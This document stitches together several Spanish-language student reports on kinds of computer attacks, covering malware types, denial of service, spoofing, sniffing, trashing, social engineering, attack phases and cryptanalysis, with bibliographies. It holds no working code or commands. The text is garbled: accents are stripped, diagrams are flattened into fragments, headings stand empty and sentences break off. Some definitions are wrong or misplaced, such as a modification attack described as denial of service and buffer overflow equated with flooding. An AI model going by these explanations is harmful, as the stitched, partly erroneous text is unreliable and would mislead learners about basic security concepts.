Para bloquear estos ataques, es importante estar familiarizado con los principales tipos y
tomar medidas preventivas.
Los ataques pueden ejecutarse por diversos motivos:
para obtener informacin acerca de una organizacin (la compaa del usuario, etc.);
para usar los recursos del sistema del usuario, en particular cuando la red en la que
est ubicado tiene un ancho de banda considerable.
ATAQUES DE RED:
Detrs de todas las utilidades que tiene, tenemos a los usuarios malintencionados acechando,
ellos tienen muchas formas de atacar las redes de ordenadores, dejando inutilizados los
servidores donde nos conectamos o invadiendo nuestra privacidad. Los expertos en seguridad
informtica se encargan de parar estos ataques, y, en la medida de lo posible disear nuevas
arquitecturas que sean inmunes a los ataques.
En los ltimos aos la seguridad en la red se ha convertido en una prioridad, porque cada vez
hay ms usuarios malintencionados que buscan cualquier vulnerabilidad para romper la
seguridad, ya sea por superarse a s mismo o por beneficios econmicos.
ATAQUES DE SOFTWARE:
Software malicioso: Clasificacin
Virus
Malware que modifica el comportamiento normal de la computadora sin la
autorizacin del usuario.
Archivos ejecutables, sectores de arranque, BIOS, tabla de participacin.
Gusanos:
Iworm
Malware que se duplica a si mismo
No necesita modificar ficheros como el virus, puede residir en memoria.
Pueden dejar el PC sin recursos, duplicarse a travs de internet usando protocolos
como SMTP, IRC, P2P
Pueden ser la puerta de entrada de controles remotos por parte de terceras personas
(ejemplo: Blaster Worm)
Troyanos
Malware que se presenta al usuario como programas normales pero que al ejecutarlo
realizan acciones dainas.
Se utilizan para establecer las denominadas botnet Redes de ordenadores infectados
que a su vez se suelen usar para ataques de denegacin de servicio.
Rootkits
Conjunto de programas destinados a tener un ordenador bajo control, permitiendo su
acceso remoto por personas no autorizadas y ocultar dicho control de cara al usuario.
Se pueden utilizar junto con los troyanos para establecer una botnet
Backdoors
Secuencias de cdigo especiales introducidas dentro de un sistema que permiten
saltarse uno o varios sistemas de seguridad dentro del sistema.
Muchas veces se introducen en el desarrollo del propio sistema con fines lcitos
(testeo)
Spyware
Malware dedicado a recoger informacin del ordenador donde se encuentra instalado
y a mandarla a travs de la red sin la autorizacin del propietario del PC.
Adware (Advertisement + software)
Software que contiene publicidad que debe ser visualizada para usar el programa.
Crimeware
Software ideado para cometer crmenes (generalmente de tipo financiero y en el
mundo empresarial).
Dialer:
Spam:
Correo electrnico con publicidad no solicitada.
Rogue:
Falso programa de seguridad Ejemplo: http://blogs.esetla.com/laboratorio/2008/12/02/animaciones-calidad-antivirus-falsos/
FakeAV:
Simula ser un antivirus. (El rogue es una definicin mas amplia)
CUADRO SINOPTICO:
Ataques Informaticos
Disponibilida
d
Denial of
SErvice (DoS)
Replay
Ataque de
dia 0
Spoofing
Confidenciali
dad
Autenticacio
n
Man in
middle
Trashing
Tampering o Data
Diddling
Un usario
anota su
psw y su
login.
Modificacio
no
eliminacion
de datos
Integridad
Malware
Grayware
Es un
ataque de
denegacion
de servicio
La
transmisin
de datos es
repetida o
retardada
Ataque a un
ordenador
que tenga
vulnerabilid
ades
Ataque para
saturar la
red
ARP DNS
WEB EMAIL GPS
Existe un
atacante
que
superviisa
una
comunicacio
n en 2
partes.
Virus y
gusanios
Backdoor
Infiltrarse y
daar un
computador
o Sistema
informatico
Drive-by
Download
Rootkits
Troyanos
Hijackers
Tipos de ataque
1. Ataques de autenticacin
Este tipo de ataque tiene como objetivo engaar al sistema de la vctima para ingresar al
mismo. Generalmente este engao se realiza tomando las sesiones ya establecidas por la
vctima u obteniendo su nombre de usuario y password.
Spoofing-Looping:
Puede traducirse como "hacerse pasar por otro" y el objetivo de esta tcnica es actuar en
nombre de otros usuarios, usualmente para realizar tareas de Snooping. Una forma comn
de Spoofing es conseguir el nombre y password de un usuario legtimo para una vez
ingresado al sistema tomar acciones en nombre de l.
2. Denial of Service (DoS):
Los protocolos existentes actualmente fueron diseados para ser empleados
en
una
comunidad abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil
desorganizar el funcionamiento de un sistema que acceder al mismo; as los ataques de
Negacin de Servicio tienen como objetivo saturar los recursos de la vctima de forma tal que
se inhabiliten los servicios brindados por la misma.
Jamming o Flooding:
Este tipo de ataques desactivan o saturan los recursos del sistema. Un atacante puede
consumir toda la memoria o espacio en disco disponible, as como enviar tanto trfico a la
red que nadie ms pueda utilizarla.
3. Modificacin (integridad).
La modificacin o dao se puede dar como:
4. Trashing (Cartoneo).
Generalmente, un usuario anota su login y password en un papelito y luego, cuando lo
recuerda, lo arroja a la basura. Este procedimiento por ms inocente que parezca es el
que puede aprovechar un atacante para hacerse de una llave para entrar el sistema..."nada se
destruye, todo se transforma". El Trashing puede ser fsico (como el caso descripto) o lgico,
como analizar buffers de impresora y memoria, bloques de discos, etc.
Ataques en la red
Internet es a da de hoy, una herramienta imprescindible para la mayora de la gente,
incluyendo empresas, universidades y el gobierno de los diferentes pases. La gente confa en
internet para hacer sus actividades profesionales y personales pero detrs de todas las
utilidades que tiene, tenemos a los usuarios malintencionados acechando, ellos tienen muchas
formas de atacar las redes de ordenadores, dejando inutilizados los servidores donde nos
conectamos o invadiendo nuestra privacidad. Los expertos en seguridad informtica se
encargan de parar estos ataques, y, en la medida de lo posible disear nuevas arquitecturas
que sean inmunes a los ataques.
Software malicioso o malware en Internet.
Un tipo de ataque a la red es la introduccin de malware en una pgina web. Cuando un
usuario navega por una web, puede, sin querer, infectarse por un malware. Los tres tipos ms
conocidos de malware son los virus, gusanos y troyanos.
Una vez que el malware ha infectado nuestro equipo (ordenador, pda, mvil) puede hacer
cualquier tipo de acciones. Las que ms destacan es el borrado de datos, recopilacin de
informacin de carcter personal (e-mails, contraseas, conversaciones). Tambin pueden
controlar todo lo que escribimos (Keyloggers) y enviarlo a su legtimo propietario (para uso de
todos los datos recogidos). Normalmente una caracterstica comn de todos ellos es que se
auto-replican, para infectar a ms usuarios, de esta forma se extender de forma exponencial.
Cuando hemos sido infectados por malware, y creemos que todo funciona bien, podemos
estar participando en una botnet que los atacantes construyen para hacer un DDoS
(Denegacin de Servicio Distribudo), de esa forma, sin saberlo puede que estemos
participando en un ataque contra un servidor para bloquearlo.
Para colapsar un servidor por inundacin de ancho de banda, el ataque ha de ser distribudo
(DDoS) ya que actualmente los servidores tienen un gran ancho de banda. Adems, sera muy
fcil detectarlo ya que slo sera desde una IP (en DoS no distribudo). El ancho de banda del
ataque se debe acercar al ancho de banda mximo de dicho servidor para colapsarlo.
Un ejemplo muy reciente de Ataque DDoS fue el realizado a la Sgae, aunque consiguieron que
la pgina no fuera accesible, no fue gracias a ellos. Acens, el hosting donde se aloja, des-enrut
dicha web (la direccin IP) para que no afectara a ninguna de las otras webs que estn alojadas
all (entre las que destacan el Grupo ADSLZone al completo, incluyendo RedesZone). El
problema de los ataques distribudos es que no sabes si el que realiza las peticiones es un
atacante, o el legtimo usuario, por tanto es mucho ms difcil de detectar y sobre todo, mucho
ms difcil defenderse de ellos.
Analizar los paquetes que fluyen por la red (sniffers).
Hoy en da, la mayora de los usuarios nos conectamos por WiFi a internet por la comodidad
que ello supone, ya que podemos navegar tranquilamente desde el sof de nuestra casa, o
desde nuestro nuevo mvil de ltima generacin y la alegra que da ir al pueblo y encontrar
una red WiFi sin contrasea, y aprovechar para leer el correo, dar un repaso a las redes
sociales y hablar por mensajera instantnea con nuestros amigos. Pues si haces todo esto,
presta atencin porque puede que tu seguridad y privacidad est peligrosamente
comprometida.
Ataques de software
Con el paso del tiempo, el software malicioso (o malware) se ha convertido en una verdadera
amenaza que puede comprometer tu ordenador, archivos, fotos, msica y datos bancarios y
poner en peligro a tus hijos. No obstante, puedes tomar precauciones para evitar convertirte
en vctima de los ciberataques y amenazas de seguridad.
- Malware
Es un tipo de software que tiene como propsito infiltrarse y daar una computadora o
sistema de informacin sin el consentimiento de los propietarios. Los malwares son
considerados en funcin de los efectos que provoquen, incluyendo diferentes tipos son los
virus, gusanos, troyanos, hijackers, stealers, ransonware, entre otros.
- Grayware o greynet
Los Grayware o greynet son software maliciosos que no son tan peligrosos como los malwares.
Suelen utilizarse para clasificar las aplicaciones o programas de cmputo y se instalan sin la
autorizacin de los usuarios. Los tipos de grayware que existe son Adware, Dialers y spyware
Bibliografa:
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/#sthash.LnrD4WCf.dpuf
http://www.coreoneit.com/tipos-de-ataques-informaticos/
http://www.fsc.ccoo.es/comunes/recursos/99922/doc28596_Seguridad_informatica.pdf
http://es.scribd.com/doc/19397003/Tipos-de-Ataques-informaticos#scribd
http://seguridadanggie.blogspot.com/2011/11/confidencialidad.html
CRIPTOGRAFA
ATAQUES
INTEGRANTES:
Efran Quingue(5809)
John Cabezas(5855)
Bryan Martnez(5812)
DEFINICIN
1
2
3
4
5
RECONOCIMIENTO (Obtencin de la
informacin de la victima)
EXPLORACION (Sondear a la victima y
obtener informacin como direcciones IP)
OBTENER ACCESO (Explotacin de
vulnerabilidades del sistema)
MANTENER ACCESO (Implementacin de
herramientas para acceso de cualquier lugar)
BORRAR HUELLAS (Eliminacin de pistas,
para evitar la deteccin del ataque)
Como evoluciona ? ..
ATAQUE ESTRUCTURADO
Involucra los hacker que conoce el desarrollo de sistemas y
saben de cdigos, estas personas hacen una exploracin
sistematizada para el ataque preciso.
ATAQUE NO ESTRUCTURADO
Involucra personas sin experiencias que realizan el ataque
con software como Script o Shell, inclusive hacen amenazas
falsas solo para probar la vulnerabilidad del sistema
TIPOS ATAQUE
(1-4)
ATAQUE EXTERNO
Este ataque hacen personas externas a la empresas, buscan
mecanismos que permitan acceder a sistemas no autorizados
recolectando informaciones.
ATAQUE INTERNO
Estos atques son los mas peligrosos, ya que realizan
personas que tienen autorizaciones segn FBI entre 60% y
80% son el mal uso de las cuentas.
TIPOS ATAQUE
(2-4)
ATAQUE PASIVOS
Escuchan contraseas de sistemas.
Anlisis de trafico.
Captura de datos.
ATAQUE ACTIVO
Intentar acceder las cuentas de terceros.
Denegacin de servicios.
Modificacin de mensajes y datos.
TIPOS ATAQUE
(3-4)
DENEGACION DE SERVICIOS
Atacan mas a tiendas informticas.
Son bien efectivos.
Trata de prevenir el acceso a ciertos servicios volviendo esta
inactiva.
TIPOS ATAQUE
(4-4)
DESBORDAMIENTO DE BUFFER
Enva mas trafico de lo que puede anticipar un programa DoS
INUNDACION SYN
Envi de muchos paquetes en inicios de sesin para desviar entre
ellas.
LAGRIMAS
Se divide el paquete extenso en pequeos y el la IP del atacante
asigna valores muy confusos para que el sistema operativo
proceso muchos valores y caiga el sistema.
ATAQUE DNS
Conocidos como zombies, se infiltran dentro de las maquinas y
enva muchas DNS con el objetivo de atorar la comunicacin.
Virus y
Gusanos
Backdoor o
Puerta Trasera
Drive-by
Downloads
Malware
Proposito:
infiltrase y daar
una computadora
o sistema
informtico
Rootkits
Troyanos
Hijackers
Keyloggers y
Stealers
Ataques de
Software
Botnets
Rogue
software
Grayware
Propsito:
Clasificar
aplicaciones o
programas
Los
Ransomware
Adware
Dialers
Spyware
ATAQUES DE SOFTWARE
AUTENTICIDAD Y DISPONIBILIDAD
MODIFICACION DE MENSAJES TRANSMITIDOS
Se trata del reenvi de datos que han sido trasmitidos, tras
haberlos modificado de forma maliciosa. Este tipo de
ataques maliciosos se suelen ocupar con informaciones
bancarias.
ATAQUE DE RED
(1-6)
ROBO DE INFORMACION
Este tipo de ataque roba la informacin mediante
intercepcin de mensajes vulnerando confidencialidades.
RECONOCIEMIENTO DE SISTEMAS
Este tipo de ataque trata de obtener informacin previa
sobre la organizacin de la red, realizndolo mediante un
escaneo de puertos para ver su sistema operativo
CONFIDENCIALIDAD
ATAQUE POR INTROMISION
Esta se da cuando alguien abre archivos uno tras otros en
nuestra computadora hasta encontrar algo que sea de su
inters. Puede ser una persona que convive con nosotros.
ATAQUE DE RED
(3-6)
ATAQUES DE RED
(4-6)
ATAQUES DE RED
(5-6)
INTEGRIDAD
ATAQUE DE INTERSECCION
Este ataque se dedica a alterar la informacin que se encuentra
validada en su computadora en su base de datos es muy comn en
los bancos y casa de bolsas.
CRIPTOGRAFIA
Riobamba, 25 de Noviembre del 2015
REALIZADO POR:
Definicin de Ataque?
Un ataque criptogrfico es un mtodo de sortear la seguridad de un sistema criptogrfico
mediante la bsqueda de debilidades en un cdigo, un mensaje cifrado, un protocolo
criptogrfico o un esquema de manejo de claves. A este proceso tambin se lo llama
"Criptoanlisis".
Tipos de Ataques.
Existen diferentes tipos de ataques criptogrficos:
1. Ataque de slo texto cifrado.
El analista dispone de un texto cifrado y quiere obtener el texto en claro o la clave. Se pueden
usar mtodos de fuerza bruta (probando todas las claves posibles hasta que obtenemos un
mensaje con sentido) o basados en diccionario (probando nicamente con un subconjunto de
las claves posibles, por ejemplo si las claves son palabras). Es importante disponer de
suficiente texto en clave para que sea fcil identificar cual es el texto en claro correcto
2. Ataque de texto en claro conocido.
El analista dispone de un texto en claro y su correspondiente texto cifrado, lo que permite
reducir el espacio de bsqueda de claves u obtener estadsticas que pueden usarse para hacer
deducciones en otros textos cifrados.
3. Ataque de Texto en Claro conocido.
El analista dispone de un texto en claro y su correspondiente texto cifrado, lo que permite
reducir el espacio de bsqueda de claves u obtener estadsticas que pueden usarse para hacer
deducciones en otros textos cifrados.
4. Ataque de texto en claro elegido.
El analista puede elegir el texto en claro y obtener el texto cifrado correspondiente. Este tipo
de ataque puede evitar duplicados y centrarse ms en las debilidades del algoritmo.
5. Ataque de texto en claro elegido adaptativo.
Es la versin adaptativa del ataque anterior.
Sniffing (Rastreo)
Spoofing (Falsificacin)
DoS (Denegacin de Servicio)
Sniffing
Spoofing
Este ataque consiste en suplantar la identidad de otra mquina de la red para tener
acceso a los recursos de un tercer sistema de manera maliciosa, basndose en algn
tipo de confianza, ya sea el nombre o la direccin IP del host suplantado.
Las tcnicas de spoofing van desde engaar al propio servidor falseando simplemente
una direccin IP, hasta lo que sera engaar directamente al usuario final (entrando ya
en Ingeniera Social).
Uno de los ejemplos ms tpicos de spoofing es el phishing.
Existen varias tcnicas de spoofing:
IP Spoofing
ARP Spoofing
DNS Spoofing
En un ataque de tipo spoofing existen tres mquinas en juego:
Mquina atacante
Mquina atacada
Mquina a suplantar
DoS
En el ataque DoS tradicional, una mquina lanza el ataque a otra; en el ataque DDoS
(Distributed Denial of Service -Denegacin de Servicio Distribuida-) es un conjunto de
mquinas distribuidas las que apuntan a un mismo objetivo.
Este tipo de ataque se suele hacer mediante botnets, conjunto de mquinas robots
que se pueden ejecutar de manera autnoma, pero controlada por otra.
Normalmente, se infectan varias mquinas dispersadas geogrficamente (mquinas
zombies) y se lanza el ataque desde todas ellas, muy difcil de interceptar.
Ataques a Software
Ataque Indirecto basado en un Algoritmo Gentico.
La mayora de los sistemas de reconocimiento de iris usan plantillas binarias. Por lo tanto, dado
el buen rendimiento de los algoritmos genticos en la optimizacin de problemas binarios,
cabe espera que sea una herramienta poderosa para atacar sistemas basados en iris.
Donde Xj y Yj son las dos plantillas de bits a comparar, Xnj y Y nj son las mscaras de ruido
correspondientes a Xj y Yj , y L es el nmero de bits comparados en cada plantilla. Xn j denota
la operacin lgica de negacin aplicada a Xnj.
Caballo de Troya
Introduccin dentro de un programa una rutina o conjunto de instrucciones, no autorizadas,
desconocida de la vctima. El programa acta de una forma diferente a como estaba previsto
(por ejemplo robando e informando al cracker) o cambia el cdigo fuente para incluir una
puerta trasera.
Ingeniera Social
Convencer a la vctima de hacer lo que en realidad no debera. Suplantacin de una autoridad
Ataque al ego Profesiones anodinas (personal de limpieza, telfono, etc) Recompensa
(concurso de contraseas )
Footprinting
Extraer toda la informacin posible del objetivo del ataque, ya sea un sistema, red o dispositivo
electrnico, previo al ataque. Esto se logra revisando los grupos de noticias pblicos de esa
comunidad (por ejemplo, whois) o los fuentes HTML de las pginas Web (wget). Existen otras
utilidades: ping, finger (en desuso), rusers, nslookup, rcpinfo, etc. Esta es la fase previa a la
preparacin de un ataque o el inicio de una auditora.
5880
Ataques Informticos
Un ataque informtico consiste en aprovechar alguna debilidad o
en el software, en el hardware, e incluso, en las personas que
ambiente informtico; a fin de obtener un beneficio, por lo
econmico, causando un efecto negativo en la seguridad del
repercute directamente en los activos de la organizacin.
falla (vulnerabilidad)
forman parte de un
general de ndole
sistema, que luego
Tipos de ataques
Ataques Estructurados
Ataques no Estructurados
Ataques externos
Ataques internos
Ataques pasivos
Ataques activos
Ataques ARP
Ataques de fuerza bruta
Gusanos
Inundaciones
Sniffers
Spoofing
Ataques dirigidos
Ataques por tunel
Ingeniera
Social
Ingeniera
Social Inversa
Trashing
(Cartoneo)
Ataques de
Monitorizacin
Ataques de
Autenticacin
Ataques de
Modificacin
ATAQUES DE RED
Un ataque red es un intento organizado e intencionado causada por una o ms
personas para causar dao o problemas a un sistema informtico dentro de
una red.
Tipos ataques de red:
ATAQUE DE INTERSECCION
SE DEDICA A DESVIAR LA INFORMACION A OTRO PUNTO QUE NO SEA EL
DESTINATARIO Y ASI PODER REVISAR LOS ARCHIVOS, INFORMACION Y CONTENIDOS
EN UN FLUJO DE RED.
ATAQUE DE MODIFICACION
SE DEDICA A ALTERAR LA INFORMACION QUE SE ENCUENTRA VALIDADA EN SU
COMPUTADORAO BASE DE DATOS.ES MUY COMUN EN LOS BANCOS Y CASA DE BOLSAS
ATAQUES DE SOFTWARE
Amenazas Lgicas
Los protocolos de comunicacin utilizados carecen (en su mayora) de
seguridad o esta ha sido implementada en forma de "parche" tiempo despus
de su creacin.
4. http://www.genbetadev.com/seguridad-informatica/evita-los-ataques-deinyeccion-de-sql
5. http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-dediferentes-ataques-a-las-redes-de-ordenadores/
Ataques de intromisin:
Ataque de intercepcin:
Ataque de modificacin:
Ataque de suplantacin:
BIBLIOGRAFIA:
http://www.monografias.com/trabajos30/seguridad-redes/seguridadredes.shtml
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-dediferentes-ataques-a-las-redes-de-ordenadores/#sthash.CZ5TMzZ3.dpuf
INTEGRANTES:
Se intenta tomar el
control
Aprovechar las
vulnerabilidades
del software
ATAQUES
Causar problemas a
un sistema
informtico
Daar otro
sistema
informtico
EXTERNOS
INTERNOS
ESTRUCTURADO
NO
ESTRUCTURADO
PASIVOS
ACTIVOS
Suplantan informacin
Infliltrar Servidores
Modificar Informacin
Negar Servicio
Difcil de prevenir pero se puede detectar ms.
Ingresar conjunto de
instrucciones no
autorizadas en un
programa.
Cambia el cdigo fuente
para incluir una puerta
trasera.
CABALLO DE
TROYA
Usa ataques
FingerBomb y Net
Flood
Forza a un
consumo elevado
de CPU.
DoS
SNOOPING
Obtiene informacin
del sistema sin
modificarla
Utiliza herramientas
del estilo troyano.
SNIFFING
DDoS
Usa ataques DoS en
forma masiva a un
mismo objeto.
Desde distintos
luggares de la red
HOMBRE EN EL
MEDIO
ATAQUE DE VULNERABILIDAD
INUNDACIN DE ANCHO DE
BANDA:
INUNDACIN DE
CONEXIONES:
Normalmente el
protocolo que se
usa es TCP, al ser
conectivo, fiable y
orientado a
conexin.
Se centra en
explotarla
mandando
mensajes
construidos
especficamente
para provocar el
fallo de la
mquina.
confidencial a travs del telfono, etc. Todos estos casos pueden constituir una
violacin de la confidencialidad.
Integridad
Es la propiedad que busca mantener los datos libres de modificaciones no autorizadas.
(No es igual a integridad referencial en bases de datos.) Grosso modo, la integridad es
el mantener con exactitud la informacin tal cual fue generada, sin ser manipulada o
alterada por personas o procesos no autorizados.
La violacin de integridad se presenta cuando un empleado, programa o proceso (por
accidente o con mala intencin) modifica o borra los datos importantes que son parte
de la informacin, as mismo hace que su contenido permanezca inalterado a menos
que sea modificado por personal autorizado, y esta modificacin sea registrada,
asegurando su precisin y confiabilidad. La integridad de un mensaje se obtiene
adjuntndole otro conjunto de datos de comprobacin de la integridad: la firma digital
es uno de los pilares fundamentales de la seguridad de la informacin.
El malware , cdigo maligno, software malicioso o software malintencionado, es un
tipo
de software que
tiene
como
objetivo
infiltrarse
o
daar
una computadora o sistema de informacin sin el consentimiento de su propietario. El
trmino malware es muy utilizado por profesionales de la informtica para referirse a
una variedad de software hostil, intrusivo o molesto. 1 El trmino virus
informtico suele aplicarse de forma incorrecta para referirse a todos los tipos de
malware, incluidos los virus verdaderos.
Disponibilidad
La disponibilidad es la caracterstica, cualidad o condicin de la informacin de
encontrarse a disposicin de quienes deben acceder a ella, ya sean personas, procesos
o aplicaciones. Grosso modo, la disponibilidad es el acceso a la informacin y a los
sistemas por personas autorizadas en el momento que as lo requieran.
En el caso de los sistemas informticos utilizados para almacenar y procesar la
informacin, los controles de seguridad utilizados para protegerlo, y los canales de
comunicacin protegidos que se utilizan para acceder a ella deben estar funcionando
correctamente. La Alta disponibilidad sistemas objetivo debe estar disponible en todo
momento, evitando interrupciones del servicio debido a cortes de energa, fallos de
hardware, y actualizaciones del sistema.
Spoofing, en trminos de seguridad de redes hace referencia al uso de tcnicas a
travs de las cuales un atacante, generalmente con usos maliciosos o de investigacin,
se hace pasar por una entidad distinta a travs de la falsificacin de los datos en una
comunicacin.
Autenticacin o autentificacin
Es la propiedad que permite identificar el generador de la informacin. Por ejemplo al
recibir un mensaje de alguien, estar seguro que es de ese alguien el que lo ha
mandado, y no una tercera persona hacindose pasar por la otra (suplantacin de
identidad). En un sistema informtico se suele conseguir este factor con el uso de
cuentas de usuario y contraseas de acceso.
Esta propiedad se puede considerar como un aspecto de la integridad -si est firmado
por alguien, est realmente enviado por el mismo- y as figura en la literatura
anglosajona.
Trashing, Se considera delito informtico toda aquella actividad criminal que,
TIPOS DE ATAQUES
Los sistemas informticos usan una diversidad de componentes, desde electricidad para
suministrar alimentacin a los equipos hasta el programa de software ejecutado mediante el
sistema operativo que usa la red.
Los ataques se pueden producir en cada eslabn de esta cadena, siempre y cuando exista una
vulnerabilidad que pueda aprovecharse a continuacin veremos los distintos tipos de ataques tanto
como fsicos como lgicos.
Acceso fsico: en este caso, el atacante tiene acceso a las instalaciones e incluso a los equipos:
Intercepcin de comunicaciones:
-Secuestro de sesin.
-Falsificacin de identidad.
-Re direccionamiento o alteracin de mensajes.
Ingeniera social: en la mayora de los casos, el eslabn ms dbil es el mismo usuario. Muchas
veces es l quien, por ignorancia o a causa de un engao, genera una vulnerabilidad en el sistema al
brindar informacin (la contrasea, por ejemplo) al pirata informtico o al abrir un archivo adjunto.
Cuando ello sucede, ningn dispositivo puede proteger al usuario contra la falsificacin: slo el
sentido comn, la razn y el conocimiento bsico acerca de las prcticas utilizadas pueden ayudar a
evitar este tipo de errores.
Puertas trampa: son puertas traseras ocultas en un programa de software que brindan acceso a su
diseador en todo momento.
Es por ello que los errores de programacin de los programas son corregidos con bastante rapidez
por su diseador apenas se publica la vulnerabilidad. En consecuencia, queda en manos de los
administradores (o usuarios privados con un buen conocimiento) mantenerse informados acerca
de las actualizaciones de los programas que usan a fin de limitar los riesgos de ataques.
ATAQUES DE RED
ATAQUE POR INTROMISION
Se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta encontrar algo que
sea de su inters. puede ser una persona que convive con nosotros.
Se da cuando alguien escucha una conversacin y no es invitada a ella. es muy comn en redes inalmbricas
ya que no se requiere de un dispositivo conectado a la red, basta, con un rango donde la seal de la red llegue a
un automvil o un edificio cercano.
ATAQUE DE INTERSECCION
Se dedica a desviar la informacin a otro punto que no sea el destinatario y asi poder revisar los
archivos, informacin y contenidos en un flujo de red.
ATAQUE DE MODIFICACION
Se dedican a negarles el uso de los recursos a los usuarios legtimos del sistema, de la informacin o
inclusive de algunas capacidades del sistema como por ejemplo:
Se dedica a dar informacin falsa o anelar una transaccin y/o hacerse pasar por un usuario
conocido. se ha puesto de moda los nuevos ladrones han hecho portales similares a los bancarios
donde las personas han descargado sus datos de tarjetas de crdito sin encontrar respuesta;
posteriormente sus tarjetas son vaciadas.
ATAQUES AL SOFTWARE
Virus:
Gusanos:
Iworm
Malware que se duplica a si mismo
No necesita modificar ficheros como el virus, puede residir en memoria.
Pueden dejar el PC sin recursos, duplicarse a travs de internet usando protocolos
como SMTP, IRC, P2P
Pueden ser la puerta de entrada de controles remotos por parte de terceras personas
(ejemplo: Blaster Worm)
INTEGRANTES:
JESS LEMA
CDIGO: 5867
Programas malignos
TIPOS DE ATAQUE
Ataque va correo electrnico
Se basa en el envi de un correo electrnico a un usuario con un script oculto en un
link a una direccin web, el atacante buscando motivar a su victima a seguir el
enlace le ofrece un premio, regalo u oferta si visita dicho vinculo, al verse atrado
por la informacin en el correo electrnico.
Software malicioso
Phishing
Se trata de desviar a los usuarios de sus paginas de Log legtimas por falsas, as,
wwww.hotmail.com a http://145.15573.484/login. La diferencia es que una reenva
lo escrito.
ATAQUES A RED
ATAQUE POR INTROMISION
se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta
encontrar algo que sea de su interes. puede ser una persona que comvive con
nosotros.
ATAQUE DE MODIFICACION
ATAQUES A SOFTWARE
Virus y Gusanos: stos, son los tipos ms conocidos de software maligno que
existen y se distinguen por la manera en que se propagan. El trmino de virus
informtico se usa para designar un programa que al ejecutarse se propaga
infectando otro software ejecutable de la misma computadora. Pueden tener un
playload que realice otras acciones maliciosas en donde se borran archivos. Los
gusanos son programas que se transmiten as mismos, explotando vulnerabilidades
en una red de computadoras para infectar otros equipos. Su principal objetivo, es
infectar a la mayor cantidad posible de usuarios y tambin puede contener
instrucciones dainas al igual que los virus. A diferencia que los gusanos, un virus
necesita la intervencin del usuario para propagarse, mientras que los gusanos se
propagan automticamente.
Bibliografa
*Siglo XXI (2009). Sistemas de Informacin. Mxico.
*(10:30
P.M).
Consultado
en
20
de
Julio
http://es.wikipedia.org/wiki/Seguridad_inform%C3%A1tica.
*(10:50
P.M).Consultado
el
20
de
Julio
http://www.youtube.com/watch?v=iwwzJQjyRSg&hl=es
de
de
2009
2009
en
en
Integrantes:
Tipos de ataques
Trashing (cartoneo):
Este ocurre generalmente cuando un usuario anota su login y password en un papelito y luego,
cuando lo recuerda, lo arroja a la basura. Esto por ms inocente que parezca es el que puede
aprovechar un atacante para hacerse de una llave para entrar al sistema.
Monitorizacin:
Este tipo de ataque se realiza para observar a la vctima y su sistema, con el objetivo de
establecer sus vulnerabilidades y posibles formas de acceso futuro.
Ataques de autenticacin:
Este tipo de ataque tiene como objetivo engaar al sistema de la vctima para ingresar al
mismo. Generalmente este engao se realiza tomando las sesiones ya establecidas por la
vctima u obteniendo su nombre de usuario y password.
Denial of Service(DOS):
Los protocolos existentes actualmente fueron diseados para ser hechos en una comunidad
abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil desorganizar
el funcionamiento de un sistema que acceder al mismo; as los ataques de Negacin de
Servicio tienen como objetivo saturar los recursos de la vctima de forma tal que se inhabilita
los servicios brindados por la misma.
Modificacin (dao): la modificacin o dao se puede dar como:
Tampering o Data Diddling: Esta categora se refiere a la modificacin desautorizada de los
datos o el software instalado en el sistema vctima (incluyendo borrado de archivos). Borrado
de Huellas: El borrado de huellas es una de las tareas ms importantes que debe realizar el
intruso despus de ingresar en un sistema, ya que, si se detecta su ingreso, el administrador
buscar como conseguir "tapar el hueco" de seguridad, evitar ataques futuros e incluso
rastrear al atacante.
Ataques a Red :
Ataques a Software:
Los ataques a Software la mayor parte son programas informticos diseados por
ciberdelincuentes conocidos como malware, para causarle algn dao o perjuicio al usuario
como el robo de informacin, modificaciones al sistema operativo y las aplicaciones instaladas
o tomar el control total del equipo
Wiki grafa:
http://www.ecured.cu/Ataque_inform%C3%A1tico
http://es.ccm.net/contents/17-introduccion-a-los-ataques
http://www.coreoneit.com/tipos-de-ataques-informaticos/
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/
http://www.semana.com/tecnologia/tips/articulo/que-malware-como-puedeprevenir/372913-3
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/